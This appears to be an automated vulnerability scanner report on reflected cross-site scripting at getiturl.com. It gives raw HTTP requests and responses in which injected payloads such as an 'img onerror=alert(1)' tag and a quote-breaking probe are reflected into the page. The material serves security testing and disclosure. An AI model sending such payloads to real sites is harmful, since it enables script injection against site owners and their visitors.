1. Cross-site scripting (reflected)
1.1. http://getiturl.com/cnetnews/0200028lq4uq [REST URL parameter 1]
1.2. http://getiturl.com/cnetnews/0200028lq4uq [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://getiturl.com |
Path: | /cnetnews/0200028lq4uq |
GET /cnetnews51895%253cimg%2520src Host: getiturl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:12:11 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 Content-Length: 72 Connection: close Content-Type: text/html App 'cnetnews51895<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Firm |
Host: | http://getiturl.com |
Path: | /cnetnews/0200028lq4uq |
GET /cnetnews/0200028lq4uq3c279'%3bcff45d50ad0 HTTP/1.1 Host: getiturl.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Tue, 14 Dec 2010 00:12:09 GMT Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1 P3P: CP="NON DSP ADM DEV PSA PSD CON OTP OUR UNR IND STP PRE UNI NAV DEM" Set-Cookie: bid=3c8286a9f12ef9f3 Content-Length: 6487 Connection: close Content-Type: text/html <HTML> <HEAD> <TITLE>GET IT: Mobile</TITLE> <LINK REL="stylesheet" TYPE="text/css" HREF="http://getiturl.com <SCRIPT LANGUAGE="javascript" TYPE="text/javascript"> var poll_coun ...[SNIP]... ue.replace( /[^0-9]/g, '' ); n = n.replace( /^1*/, '' ); if ( check_number( n ) ) { var f = document.getElementById( 'device-form' ); f.action = 'http://getiturl.com f.submit(); } else { alert( 'You must enter a valid 10 digit US mobile number.' ); } } function check_email() { var n = document.getElementById( 'email' ).value; window.locat ...[SNIP]... |